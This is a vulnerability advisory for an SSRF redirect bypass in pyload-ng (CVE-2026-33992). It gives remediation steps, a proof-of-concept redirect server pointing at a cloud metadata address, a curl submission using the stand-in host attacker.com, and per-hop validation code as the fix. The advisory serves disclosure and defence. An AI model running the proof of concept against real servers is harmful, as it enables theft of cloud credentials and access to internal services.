### Vulnerability Overview

**CVE-2026-33992** (related to CVE-2026-35459) is an SSRF (Server-Side Request Forgery) bypass vulnerability.

* **Root Cause**: The previous fix only validated the initial download URL within `BaseDownloader.download()`. However, pycurl is configured to follow HTTP redirects automatically (`FOLLOWLOCATION=1` and `MAXREDIRS=10`), and the redirect destination addresses are never validated against the SSRF filters.
* **Exploitation**: An authenticated user with ADD permissions can submit a URL that redirects to an internal address, thereby bypassing the SSRF restrictions.
* **Severity**: High.

### Scope of Impact

* **Affected Versions**: `pyload-ng` <= 0.5.0b3
* **Fixed Versions**: `pyload-ng` 0.5.0b3.dev97
* **Prerequisites**: The attacker must be an authenticated user with ADD permissions.
* **Potential Impact**:
  * Access cloud metadata endpoints (AWS, GCP, DigitalOcean, Azure, etc.) to retrieve IAM credentials and instance identity.
  * Access internal network services (10.x, 172.16.x, 192.168.x).
  * Access local services (127.0.0.1).

### Remediation

The following measures are recommended to remediate this issue:

1. **Disable Automatic Redirects**: Set `pycurl.FOLLOWLOCATION = 0` within `HTTPRequest.__init__()`.
2. **Manually Validate Redirects**: Implement the redirect-following logic manually within the `download` routine and perform SSRF validation at every hop.
3. **Restrict Protocols**: Set `pycurl.REDIR_PROTOCOLS` to `pycurl.PROTO_HTTP | pycurl.PROTO_HTTPS`.
4. **Add Callback Validation**: Implement a pycurl callback to validate the target IP before a redirect is followed.

### POC Code

**1. Redirect Server Code:**

```python
from http.server import HTTPServer, BaseHTTPRequestHandler


class RedirectHandler(BaseHTTPRequestHandler):
    def do_GET(self):
        # Answer every request with a redirect to the cloud metadata address
        self.send_response(302)
        self.send_header("Location", "http://169.254.169.254/metadata/v1.json")
        self.end_headers()


HTTPServer(("0.0.0.0", 8888), RedirectHandler).serve_forever()
```

**2. Submission Request Code (to pyload):**

```bash
# The form body must be quoted, otherwise the shell treats '&' as a command separator
curl -b cookies.txt -X POST "http://target:8080/json/add_package" \
  -d "name=ssrf-test&add_dest=&add_links=http://attacker.com:8888/redirect"
```
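The per-hop validation that remediation steps 1 to 3 call for, as an added example rather than pyload's own code: redirects are followed manually, and every hop is resolved and checked before it is requested. The `request` callable stands in for a pycurl transfer made with `FOLLOWLOCATION=0`; the host `attacker.example`, the canned responses and the resolver table are constructed so the block runs offline against the same redirect chain as the POC above.

```python
import ipaddress
import socket
from urllib.parse import urljoin, urlsplit

class SSRFBlocked(Exception):
    """Raised when a request or redirect hop would reach a non-public address."""

def resolve(host):
    return {ai[4][0].split("%")[0] for ai in socket.getaddrinfo(host, None)}  # strip IPv6 scope id

def validate_url(url, resolver=resolve):
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https") or not parts.hostname:  # step 3: http/https only
        raise SSRFBlocked(f"refusing {url!r}: scheme or host not allowed")
    for addr in resolver(parts.hostname):  # one non-public record is enough to refuse the host
        ip = ipaddress.ip_address(addr)
        if ip.version == 6 and ip.ipv4_mapped:  # ::ffff:10.0.0.1 is really 10.0.0.1
            ip = ip.ipv4_mapped
        if not ip.is_global:  # private, loopback, link-local (169.254/16), reserved
            raise SSRFBlocked(f"{parts.hostname} -> {ip} is not a public address")

def fetch_validated(url, request, resolver=resolve, max_redirects=10):
    # request(url) makes ONE request with redirects off (FOLLOWLOCATION=0) and returns
    # (status, headers, body); every hop is validated before it is fetched (steps 1 and 2).
    for _ in range(max_redirects + 1):
        validate_url(url, resolver)
        status, headers, body = request(url)
        if status not in (301, 302, 303, 307, 308):
            return url, status, body
        if not headers.get("location"):
            raise SSRFBlocked("redirect without Location header")
        url = urljoin(url, headers["location"])  # relative Location resolves against current URL
    raise SSRFBlocked("too many redirects")

# Constructed offline stand-ins: the chain from the POC above plus a benign relative redirect.
CANNED = {
    "http://attacker.example:8888/redirect": (302, {"location": "http://169.254.169.254/metadata/v1.json"}, b""),
    "http://attacker.example:8888/file": (302, {"location": "/file.bin"}, b""),
    "http://attacker.example:8888/file.bin": (200, {}, b"payload"),
}

def demo():
    request = lambda url: CANNED.get(url, (404, {}, b""))
    resolver = lambda host: {"attacker.example": {"93.184.216.34"}}.get(host, {host})
    ok = fetch_validated("http://attacker.example:8888/file", request, resolver)
    try:
        fetch_validated("http://attacker.example:8888/redirect", request, resolver)
    except SSRFBlocked as exc:
        return ok, str(exc)
    return ok, None
```

`demo()` returns the benign download result and the message for the blocked metadata hop; with a real transport, `resolve` performs a live DNS lookup, so an unresolvable host fails the download rather than slipping past the check.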